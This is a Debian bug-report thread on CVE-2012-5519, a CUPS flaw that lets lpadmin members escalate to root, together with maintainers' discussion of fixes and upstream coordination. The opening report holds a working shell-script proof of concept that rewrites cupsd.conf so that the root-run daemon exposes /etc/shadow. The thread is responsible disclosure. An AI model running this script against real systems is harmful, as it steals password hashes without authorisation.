Debian Bug report logs - #692791
members of lpadmin can read every file on server via cups

version graph

Package: cups; Maintainer for cups is Debian Printing Team <debian-printing@lists.debian.org>; Source for cups is src:cups.

Reported by: Jörg Ludwig <joerg.ludwig@iserv.eu>

Date: Thu, 8 Nov 2012 22:48:02 UTC

Severity: critical

Tags: security

Found in versions cups/1.4.4-7+squeeze1, cups/1.5.3-2.6, cups/1.5.3-2.4

Fixed in versions cups/1.5.3-2.7, cups/1.4.4-7+squeeze2, cups/1.6.1-1

Done: Didier Raboud <odyx@debian.org>

Bug is archived. No further changes may be made.

Forwarded to https://www.cups.org/str.php?L4223

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Thu, 08 Nov 2012 22:48:04 GMT) Full text and rfc822 format available.

Acknowledgement sent to Jörg Ludwig <joerg.ludwig@iserv.eu>:
New Bug report received and forwarded. Copy sent to team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Thu, 08 Nov 2012 22:48:04 GMT) Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Jörg Ludwig <joerg.ludwig@iserv.eu>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: members of lpadmin can read every file on server via cups
Date: Thu, 08 Nov 2012 23:23:41 +0100
Package: cups
Version: 1.4.4-7+squeeze1
Severity: critical
Tags: security
Justification: root security hole

Members of lpadmin cat read /var/run/cups/certs/0. With this key it is possible to access the cups web interface as admin. You can edit the cups config file and set the page log to any filename you want (for example /etc/shadow). Then you can read the file contents by viewing the cups page log. By printing you can also write some random data to the given file.

As it is not possible to use the cups authentication with a normal webbrowser I created a simple shell script to show the effect. When called as any unprivileged user which is member of lpadmin it should display the contents of /etc/shadow:


#!/bin/sh
set -e

# backup cupsd.conf
cp /etc/cups/cupsd.conf /tmp

AUTH="Authorization: Local $(cat /var/run/cups/certs/0)"

POST -d -H "$AUTH" -H "Cookie: org.cups.sid="
http://localhost:631/admin/ <<EOF
OP=config-server&org.cups.sid=&SAVECHANGES=1&CUPSDCONF=Listen
localhost:631%0APageLog /etc/shadow
EOF

GET http://localhost:631/admin/log/page_log


This bug was detected by one of our customers, Jann Horn.

-- System Information:
Debian Release: 6.0.6
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages cups depends on:
ii  adduser             3.112+nmu2           add and remove users and groups
ii  bc                  1.06.95-2            The GNU bc arbitrary precision cal
ii  cups-client         1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  cups-common         1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  cups-ppdc           1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  debconf [debconf-2. 1.5.36.1             Debian configuration management sy
ii  ghostscript         8.71~dfsg2-9         The GPL Ghostscript PostScript/PDF
ii  libavahi-client3    0.6.27-2+squeeze1    Avahi client library
ii  libavahi-common3    0.6.27-2+squeeze1    Avahi common library
ii  libc6               2.11.3-4             Embedded GNU C Library: Shared lib
ii  libcups2            1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupscgi1         1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupsdriver1      1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupsimage2       1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupsmime1        1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libcupsppdc1        1.4.4-7+squeeze1     Common UNIX Printing System(tm) - 
ii  libdbus-1-3         1.2.24-4+squeeze1    simple interprocess messaging syst
ii  libgcc1             1:4.4.5-8            GCC support library
ii  libgnutls26         2.8.6-1+squeeze2     the GNU TLS library - runtime libr
ii  libgssapi-krb5-2    1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries - k
ii  libijs-0.35         0.35-7               IJS raster image transport protoco
ii  libkrb5-3           1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries
ii  libldap-2.4-2       2.4.23-7.2           OpenLDAP libraries
ii  libpam0g            1.1.1-6.1+squeeze1   Pluggable Authentication Modules l
ii  libpaper1           1.1.24               library for handling paper charact
ii  libpoppler5         0.12.4-1.2           PDF rendering library
ii  libslp1             1.2.1-7.8            OpenSLP libraries
ii  libstdc++6          4.4.5-8              The GNU Standard C++ Library v3
ii  libusb-0.1-4        2:0.1.12-16          userspace USB programming library
ii  lsb-base            3.2-23.2squeeze1     Linux Standard Base 3.2 init scrip
ii  poppler-utils       0.12.4-1.2           PDF utilitites (based on libpopple
ii  procps              1:3.2.8-9squeeze1    /proc file system utilities
ii  ssl-cert            1.0.28               simple debconf wrapper for OpenSSL
ii  ttf-freefont        20090104-7           Freefont Serif, Sans and Mono True
ii  zlib1g              1:1.2.3.4.dfsg-3     compression library - runtime

Versions of packages cups recommends:
ii  cups-driver-gutenprint  5.2.6-1          printer drivers for CUPS
ii  foomatic-filters        4.0.5-6+squeeze2 OpenPrinting printer support - fil
ii  ghostscript-cups        8.71~dfsg2-9     The GPL Ghostscript PostScript/PDF

Versions of packages cups suggests:
ii  cups-bsd               1.4.4-7+squeeze1  Common UNIX Printing System(tm) - 
pn  cups-pdf               <none>            (no description available)
ii  foomatic-db            20100630-1        OpenPrinting printer support - dat
pn  hplip                  <none>            (no description available)
ii  smbclient              2:3.6.6-2~bpo60+1 command-line SMB/CIFS clients for 
ii  udev                   164-3             /dev/ and hotplug management daemo
pn  xpdf-korean | xpdf-jap <none>            (no description available)

-- Configuration Files:
/etc/cups/cupsd.conf changed [not included]

-- debconf information excluded



Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Thu, 08 Nov 2012 23:48:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to Jörg Ludwig <joerg.ludwig@iserv.eu>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Thu, 08 Nov 2012 23:48:06 GMT) Full text and rfc822 format available.

Message #10 received at 692791@bugs.debian.org (full text, mbox):

From: Jörg Ludwig <joerg.ludwig@iserv.eu>
To: 692791@bugs.debian.org
Subject: Re: members of lpadmin can read every file on server via cups
Date: Fri, 09 Nov 2012 00:26:09 +0100
[Message part 1 (text/plain, inline)]
A line break got inserted into the script while posting. Here is the 
correct one.

-- 
Mit freundlichen Grüßen,

Jörg Ludwig

IServ GmbH
Rebenring 33
38106 Braunschweig

Telefon:     0531-3804450
Fax:         0531-4287745
Mobil:       0179-9101055
E-Mail:      joerg.ludwig@iserv.eu
Internet:    www.iserv.eu
USt.-IdNr.:  DE265149425
[cups_exploit (text/plain, attachment)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sat, 10 Nov 2012 11:51:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to "Didier 'OdyX' Raboud" <odyx@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sat, 10 Nov 2012 11:51:03 GMT) Full text and rfc822 format available.

Message #15 received at 692791@bugs.debian.org (full text, mbox):

From: "Didier 'OdyX' Raboud" <odyx@debian.org>
To: Jörg Ludwig <joerg.ludwig@iserv.eu>, 692791@bugs.debian.org, team@security.debian.org
Subject: Re: Bug#692791: members of lpadmin can read every file on server via cups
Date: Sat, 10 Nov 2012 12:48:39 +0100
[Message part 1 (text/plain, inline)]
Control: found -1 1.5.3-2.6
Control: found -1 1.5.3-2.4

Hi Jörg, and thanks for your bugreport,

as far as I understand your report, there are two seperate issues:

a) members of the lpadmin group can login to the webinterface password-less, 
using the /var/run/cups/certs/0 file that they can read. Granted, that's a 
bug, but a non-severe one as these users can login to the webinterface using 
their password.
b) members of the lpadmin group can change the /etc/cups/cupsd.conf file 
completely and trigger a server restart. By that, they can get the cupsd 
daemon (which runs as root) do almost what they want, e.g. read root-owned 
files (/etc/shadow, …), run commands as other users, … This is basically an 
lpadmin-to-root privilege escalation

I have successfully used your exploit script on the Sid version, tagging as 
found there.

== Possible solutions

I see these possible solutions (to be investigated):

* Have cupsd run as lp user
* Forbid any changes to the config file from the webinterface
* Another idea ?

== Next actions

* Report bug to upstream tracker (I'll do it)
* Request a CVE ? (Security team members ?)
* Fix it :)

Security team members: any better idea / procedure?

Cheers, OdyX

Le jeudi, 8 novembre 2012 23.23:41, Jörg Ludwig a écrit :
> Members of lpadmin cat read /var/run/cups/certs/0. With this key it is
> possible to access the cups web interface as admin. You can edit the cups
> config file and set the page log to any filename you want (for example
> /etc/shadow). Then you can read the file contents by viewing the cups page
> log. By printing you can also write some random data to the given file.
> 
> As it is not possible to use the cups authentication with a normal
> webbrowser I created a simple shell script to show the effect. When called
> as any unprivileged user which is member of lpadmin it should display the
> contents of /etc/shadow:
[signature.asc (application/pgp-signature, inline)]

Marked as found in versions cups/1.5.3-2.6. Request was from "Didier 'OdyX' Raboud" <odyx@debian.org> to 692791-submit@bugs.debian.org. (Sat, 10 Nov 2012 11:51:03 GMT) Full text and rfc822 format available.

Marked as found in versions cups/1.5.3-2.4. Request was from "Didier 'OdyX' Raboud" <odyx@debian.org> to 692791-submit@bugs.debian.org. (Sat, 10 Nov 2012 11:51:04 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sat, 10 Nov 2012 12:21:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to "Didier 'OdyX' Raboud" <odyx@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sat, 10 Nov 2012 12:21:06 GMT) Full text and rfc822 format available.

Message #24 received at 692791@bugs.debian.org (full text, mbox):

From: "Didier 'OdyX' Raboud" <odyx@debian.org>
To: 692791@bugs.debian.org, team@security.debian.org
Subject: Re: Bug#692791: members of lpadmin can read every file on server via cups
Date: Sat, 10 Nov 2012 13:19:23 +0100
[Message part 1 (text/plain, inline)]
Control: forwarded -1 https://www.cups.org/str.php?L4223

Le samedi, 10 novembre 2012 12.48:39, Didier 'OdyX' Raboud a écrit :
> * Report bug to upstream tracker (I'll do it)

This has now been done, to STR #4223, currently hidden from public view as it 
is tagged as "security".

Cheers,

OdyX
[signature.asc (application/pgp-signature, inline)]

Set Bug forwarded-to-address to 'https://www.cups.org/str.php?L4223'. Request was from "Didier 'OdyX' Raboud" <odyx@debian.org> to 692791-submit@bugs.debian.org. (Sat, 10 Nov 2012 12:21:06 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sat, 10 Nov 2012 12:48:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Martin Pitt <mpitt@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sat, 10 Nov 2012 12:48:03 GMT) Full text and rfc822 format available.

Message #31 received at 692791@bugs.debian.org (full text, mbox):

From: Martin Pitt <mpitt@debian.org>
To: Didier 'OdyX' Raboud <odyx@debian.org>, 692791@bugs.debian.org
Subject: Re: [Pkg-cups-devel] Bug#692791: members of lpadmin can read every file on server via cups
Date: Sat, 10 Nov 2012 13:44:22 +0100
[Message part 1 (text/plain, inline)]
Didier 'OdyX' Raboud [2012-11-10 12:48 +0100]:
> * Have cupsd run as lp user

We had done that in Debian for several years for security reasons. We
had a huge patch to make most of cups work as user "lp", but at some
point I gave up: it caused too many bugs, didn't work with a lot of
third-party drivers, and broke with every new upstream release.
Upstream has never bought into the idea of running the main server as
an unprivileged system user unfortunately.

So this is possible in principle, but will mean a huge maintenance
overhead.

> * Forbid any changes to the config file from the webinterface

That would drop a huge piece of functionality.

> * Another idea ?

cupsd could temporarily drop privileges to lp when reading log files;
with that you are restricted to reading world-readable files as well
as cups' own files, which should be fine?

Martin

-- 
Martin Pitt                        | http://www.piware.de
Ubuntu Developer (www.ubuntu.com)  | Debian Developer  (www.debian.org)
[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sat, 10 Nov 2012 12:51:04 GMT) Full text and rfc822 format available.

Acknowledgement sent to Yves-Alexis Perez <corsac@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sat, 10 Nov 2012 12:51:04 GMT) Full text and rfc822 format available.

Message #36 received at 692791@bugs.debian.org (full text, mbox):

From: Yves-Alexis Perez <corsac@debian.org>
To: oss-security@lists.openwall.com
Cc: 692791@bugs.debian.org, team@security.debian.org, cups-security@apple.com
Subject: Privilege escalation (lpadmin -> root) in cups
Date: Sat, 10 Nov 2012 13:49:43 +0100
[Message part 1 (text/plain, inline)]
Hi,

a Debian user reported a bug in our BTS concerning cupsd. The bug is
available at http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791 and
upstream bug at http://www.cups.org/str.php?L4223 (restricted because
it's tagged security).

I'm unsure right now if it's an upstream issue or specific to Debian.

Basically, members of the lpadmin group (which is the group having admin
rights to cups, meaning they're supposed to be able to add/remove
printeers etc.) have admin access to the web interface, where they can
edit the config file and set some “dangerous” directives (like the log
filenames), which enable them to read or write files as the user running
the cupsd webserver.

In Debian case at least, it's run as root, meaning we have a privilege
escalation issue from lpadmin group to root.

A fix would be to not run cupsd web server as root, and maybe to
restrict it to some kind of chroot so it doesn't have access to
sensitive files

Can a CVE be allocated for this?

Regards,
-- 
Yves-Alexis
[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sat, 10 Nov 2012 20:03:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Jeff Licquia <licquia@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sat, 10 Nov 2012 20:03:03 GMT) Full text and rfc822 format available.

Message #41 received at 692791@bugs.debian.org (full text, mbox):

From: Jeff Licquia <licquia@debian.org>
To: Didier 'OdyX' Raboud <odyx@debian.org>, 692791@bugs.debian.org
Cc: Jörg Ludwig <joerg.ludwig@iserv.eu>, team@security.debian.org
Subject: Re: [Pkg-cups-devel] Bug#692791: members of lpadmin can read every file on server via cups
Date: Sat, 10 Nov 2012 14:50:50 -0500
Control: found -1 1.4.4-7+squeeze1

On 11/10/2012 06:48 AM, Didier 'OdyX' Raboud wrote:
> I have successfully used your exploit script on the Sid version, tagging as 
> found there.

Just to complete the picture, I tried the exploit on squeeze, and it
works there too.




Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sat, 10 Nov 2012 22:09:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to Jeff Licquia <licquia@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sat, 10 Nov 2012 22:09:06 GMT) Full text and rfc822 format available.

Message #46 received at 692791@bugs.debian.org (full text, mbox):

From: Jeff Licquia <licquia@debian.org>
To: Martin Pitt <mpitt@debian.org>, 692791@bugs.debian.org
Cc: Didier Raboud <odyx@debian.org>, team@security.debian.org
Subject: Re: [Pkg-cups-devel] Bug#692791: Bug#692791: members of lpadmin can read every file on server via cups
Date: Sat, 10 Nov 2012 17:06:31 -0500
[Message part 1 (text/plain, inline)]
[Re-adding security team to CC.]

On 11/10/2012 07:44 AM, Martin Pitt wrote:
> Didier 'OdyX' Raboud [2012-11-10 12:48 +0100]:
>> * Have cupsd run as lp user
> 
> We had done that in Debian for several years for security reasons. We
> had a huge patch to make most of cups work as user "lp", but at some
> point I gave up: it caused too many bugs, didn't work with a lot of
> third-party drivers, and broke with every new upstream release.
> Upstream has never bought into the idea of running the main server as
> an unprivileged system user unfortunately.
> 
> So this is possible in principle, but will mean a huge maintenance
> overhead.

Maybe this situation will help make the case. :-)

>> * Forbid any changes to the config file from the webinterface
> 
> That would drop a huge piece of functionality.

CUPS allows changes to the config file in two ways: changing a small
subset of settings in a way that's checked server-side, and editing
cupsd.conf in a browser by downloading the file, and then uploading the
edited version post-edit.  The latter functionality is what's being
exploited here, and it strikes me as far more dangerous than the former.

I've attached a proposed dpatch which disables just cupsd.conf editing.
 It's against the squeeze version, but applies fairly cleanly to the
wheezy version.  I've tested it against the exploit script, which no
longer dumps /etc/shadow to stdout with the patch applied.

Best of all, this patch doesn't completely disable configuring the
server from a browser, just the wholesale cupsd.conf edit.

I'm not sure this is "upstream-worthy", but it might do until upstream
gets a better fix written.

>> * Another idea ?
> 
> cupsd could temporarily drop privileges to lp when reading log files;
> with that you are restricted to reading world-readable files as well
> as cups' own files, which should be fine?

I suspect this fix would end up in a game of "whack-a-mole", as we find
interesting settings which trick cupsd into doing nefarious things.


[bug-692791.dpatch (text/plain, attachment)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sun, 11 Nov 2012 07:21:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Kurt Seifried <kseifried@redhat.com>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sun, 11 Nov 2012 07:21:04 GMT) Full text and rfc822 format available.

Message #51 received at 692791@bugs.debian.org (full text, mbox):

From: Kurt Seifried <kseifried@redhat.com>
To: oss-security@lists.openwall.com
Cc: Yves-Alexis Perez <corsac@debian.org>, 692791@bugs.debian.org, team@security.debian.org, cups-security@apple.com
Subject: Re: [oss-security] Privilege escalation (lpadmin -> root) in cups
Date: Sun, 11 Nov 2012 00:18:13 -0700
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 11/10/2012 05:49 AM, Yves-Alexis Perez wrote:
> Hi,
> 
> a Debian user reported a bug in our BTS concerning cupsd. The bug
> is available at
> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791 and 
> upstream bug at http://www.cups.org/str.php?L4223 (restricted
> because it's tagged security).
> 
> I'm unsure right now if it's an upstream issue or specific to
> Debian.

On Red Hat Enterprise 6 and Fedora 16 the file is owned by root:sys,
and the cupsd.conf defaults to:

<Location /admin/conf>
  AuthType Default
  Require user @SYSTEM
  Order allow,deny
</Location>

so that should be like "root", "bin" and "adm" so yeah it would appear
to be vendor specific.

> Basically, members of the lpadmin group (which is the group having
> admin rights to cups, meaning they're supposed to be able to
> add/remove printeers etc.) have admin access to the web interface,
> where they can edit the config file and set some “dangerous”
> directives (like the log filenames), which enable them to read or
> write files as the user running the cupsd webserver.
> 
> In Debian case at least, it's run as root, meaning we have a
> privilege escalation issue from lpadmin group to root.

I think as a rule cupsd runs as root, to touch the various files/dirs/etc.

> A fix would be to not run cupsd web server as root, and maybe to 
> restrict it to some kind of chroot so it doesn't have access to 
> sensitive files

Tricky, /dev/*, log dirs, etc. Probably better to just use a print
specific user/group and make all the standard locations owned by it,
and require the admin to setup anything like say
/non-standard/log/printers/ and so on.

> Can a CVE be allocated for this?

Please use CVE-2012-5519 for this issue. Also if other vendors could
check the permissions/configs/etc. and reply if they are vulnerable
that would be good.

> Regards,
> 



- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBAgAGBQJQn1E1AAoJEBYNRVNeJnmTAk0QAJzI9+STxsFAL7YJm4obCLAY
PhVVZYau19qUxMlMEIahfvcV46/36zYZPKYtNJCNtH7G30lPqC2gfZ3upNbri8+u
71tZw15UMU6qAt/WNpfe9URjSNHRcO8tJ6OqN6u6er13YhdVkls6/Yudty1hAZoU
wqd1xcBDv2uhaOsI5SswfSHC61JkBLRD7f13T6eWfSz5VT1TBwzJyP5yLTygx4jt
wRnF/dBUSToSSqlLyP1gdSJWs6ksTtaVc7vHkCD2NVCZMPOn9lm9RiVj52Q1e/eR
osbqbCwx8P3FC4w+MvN29+GbfRxdFA6ik4IHrpzR3Q+j105aQwIm0pubsENA2Lr3
YHnvoD4oysfr3zUGYs5dbH1qITTw2t5c2oAP1wfG7C52jjblg3AaDDSgACyJFciQ
kqcmSnDdBdcpc9dpGFo02LSOkh1jyVmBUCjTfXiNkpTtMv++CtgGdQM6j/UgAh1Q
28yf5WhxuhdGPo28XNWbYj9ELAe4aDAssggTL+ysM8Xjc23hfBXowCNbkO4LqrlQ
S14M04wi4eHrd8sj+DpzODm9ttOrnCCmzuNc5UBlxH2Mxk6LUVczU5RwDJ/wFPKA
DoHFiCldax69zjRsLv/wgu3oNfn8Hi3Piyn/TfGmFEnnnejCUe5lDUIRzZgj+LoB
62nQOCDF/bsxQWwJdDPl
=zMgY
-----END PGP SIGNATURE-----



Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sun, 11 Nov 2012 09:03:05 GMT) Full text and rfc822 format available.

Acknowledgement sent to Yves-Alexis Perez <corsac@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sun, 11 Nov 2012 09:03:05 GMT) Full text and rfc822 format available.

Message #56 received at 692791@bugs.debian.org (full text, mbox):

From: Yves-Alexis Perez <corsac@debian.org>
To: oss-security@lists.openwall.com
Cc: 692791@bugs.debian.org, team@security.debian.org
Subject: Re: [oss-security] Privilege escalation (lpadmin -> root) in cups
Date: Sun, 11 Nov 2012 10:01:35 +0100
[Message part 1 (text/plain, inline)]
On dim., 2012-11-11 at 00:18 -0700, Kurt Seifried wrote:
> On 11/10/2012 05:49 AM, Yves-Alexis Perez wrote:
> > Hi,
> > 
> > a Debian user reported a bug in our BTS concerning cupsd. The bug
> > is available at
> > http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791 and 
> > upstream bug at http://www.cups.org/str.php?L4223 (restricted
> > because it's tagged security).
> > 
> > I'm unsure right now if it's an upstream issue or specific to
> > Debian.
> 
> On Red Hat Enterprise 6 and Fedora 16 the file is owned by root:sys,
> and the cupsd.conf defaults to:
> 
> <Location /admin/conf>
>   AuthType Default
>   Require user @SYSTEM
>   Order allow,deny
> </Location>

As far as I can tell, @SYSTEM is defined using SystemGroup and defaults
to lpadmin.
> 
> so that should be like "root", "bin" and "adm" so yeah it would appear
> to be vendor specific.

Well, in Debian (and upstream) case it's lpadmin -> root but in your
case it'd be bin -> root and adm -> root. Maybe adm is intended to be
root anyway but I guess that's not the case for bin?

The whole point is that people with access to the admin web interface
can force cupsd to read or write files with the user running cupsd
(root).
> 
> > Basically, members of the lpadmin group (which is the group having
> > admin rights to cups, meaning they're supposed to be able to
> > add/remove printeers etc.) have admin access to the web interface,
> > where they can edit the config file and set some “dangerous”
> > directives (like the log filenames), which enable them to read or
> > write files as the user running the cupsd webserver.
> > 
> > In Debian case at least, it's run as root, meaning we have a
> > privilege escalation issue from lpadmin group to root.
> 
> I think as a rule cupsd runs as root, to touch the various files/dirs/etc.
> 
> > A fix would be to not run cupsd web server as root, and maybe to 
> > restrict it to some kind of chroot so it doesn't have access to 
> > sensitive files
> 
> Tricky, /dev/*, log dirs, etc. Probably better to just use a print
> specific user/group and make all the standard locations owned by it,
> and require the admin to setup anything like say
> /non-standard/log/printers/ and so on.
> 
> > Can a CVE be allocated for this?
> 
> Please use CVE-2012-5519 for this issue. Also if other vendors could
> check the permissions/configs/etc. and reply if they are vulnerable
> that would be good.

Thanks.

Regards,
-- 
Yves-Alexis
[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sun, 11 Nov 2012 15:00:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to Michael Sweet <msweet@apple.com>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sun, 11 Nov 2012 15:00:06 GMT) Full text and rfc822 format available.

Message #61 received at 692791@bugs.debian.org (full text, mbox):

From: Michael Sweet <msweet@apple.com>
To: "692791@bugs.debian.org" <692791@bugs.debian.org>
Subject: Re:running cupsd as root
Date: Sun, 11 Nov 2012 08:57:05 -0500
All,

Lest we forget why we run cupsd as root, here are a few reasons:

1. Authentication (both Kerberos and PAM)
2. Privileged ports for LPD
3. Access to device files for printing
4. Privilege separation from/for filters.

1 and 4 basically require running as root unless we do a hairy mess of meta services between "trusted" programs. We /are/ looking into this for future versions of cupsd but I can't promise anything right now.

2 remains as intractable as before, but with OS support or future elimination of protocols like LPD perhaps it will go away,

3 requires OS support, and to date we have had only limited success for things like USB.

....

As for a proposed fix, I'm thinking we will disable the log file, RequestRoot, ServerRoot, and DocumentRoot directives in cupsd.conf, and add command line arguments in their place. That will retain configurability while eliminating this particular attack vector.

Thoughts?

Sent from my iPad



Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sun, 11 Nov 2012 16:54:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to "Didier 'OdyX' Raboud" <odyx@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sun, 11 Nov 2012 16:54:03 GMT) Full text and rfc822 format available.

Message #66 received at 692791@bugs.debian.org (full text, mbox):

From: "Didier 'OdyX' Raboud" <odyx@debian.org>
To: 692791@bugs.debian.org
Cc: Michael Sweet <msweet@apple.com>
Subject: Re: Bug#692791: running cupsd as root
Date: Sun, 11 Nov 2012 17:53:08 +0100
Hi Michael,

Le dimanche, 11 novembre 2012 14.57:05, Michael Sweet a écrit :
> Lest we forget why we run cupsd as root, here are a few reasons:
> (…)

Thanks for the explanation.

> As for a proposed fix, I'm thinking we will disable the log file,
> RequestRoot, ServerRoot, and DocumentRoot directives in cupsd.conf, and
> add command line arguments in their place. That will retain
> configurability while eliminating this particular attack vector.
> 
> Thoughts?

I don't quite like the "command-line arguments" solution, as it will probably 
lead to more machinery on our side (variable setting in /etc/default/cups , 
sourcing it from /etc/init.d/cups, etc).

What about separating the configuration settings in two configuration files, 
one modifiable from the webinterface, and one only modifiable by root ? The 
first would contain the non-sensitive configuration settings, the latter would 
contain the paths, file definitions, etc. I would tend to prefer to keep 
configuration settings in configuration files. (But of course we'll cope with 
the upstream choice. :-) )

Cheers,

OdyX



Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Mon, 19 Nov 2012 07:03:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Yves-Alexis Perez <corsac@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Mon, 19 Nov 2012 07:03:03 GMT) Full text and rfc822 format available.

Message #71 received at 692791@bugs.debian.org (full text, mbox):

From: Yves-Alexis Perez <corsac@debian.org>
To: Didier 'OdyX' Raboud <odyx@debian.org>
Cc: 692791@bugs.debian.org, Michael Sweet <msweet@apple.com>
Subject: Re: Bug#692791: running cupsd as root
Date: Mon, 19 Nov 2012 07:59:10 +0100
[Message part 1 (text/plain, inline)]
On dim., 2012-11-11 at 17:53 +0100, Didier 'OdyX' Raboud wrote:
> Hi Michael,
> 
> Le dimanche, 11 novembre 2012 14.57:05, Michael Sweet a écrit :
> > Lest we forget why we run cupsd as root, here are a few reasons:
> > (…)
> 
> Thanks for the explanation.
> 
> > As for a proposed fix, I'm thinking we will disable the log file,
> > RequestRoot, ServerRoot, and DocumentRoot directives in cupsd.conf, and
> > add command line arguments in their place. That will retain
> > configurability while eliminating this particular attack vector.
> > 
> > Thoughts?
> 
> I don't quite like the "command-line arguments" solution, as it will probably 
> lead to more machinery on our side (variable setting in /etc/default/cups , 
> sourcing it from /etc/init.d/cups, etc).
> 
> What about separating the configuration settings in two configuration files, 
> one modifiable from the webinterface, and one only modifiable by root ? The 
> first would contain the non-sensitive configuration settings, the latter would 
> contain the paths, file definitions, etc. I would tend to prefer to keep 
> configuration settings in configuration files. (But of course we'll cope with 
> the upstream choice. :-) )
> 

Any news on this?

-- 
Yves-Alexis Perez
 Debian Security
[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Mon, 19 Nov 2012 13:00:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Michael Sweet <msweet@apple.com>:
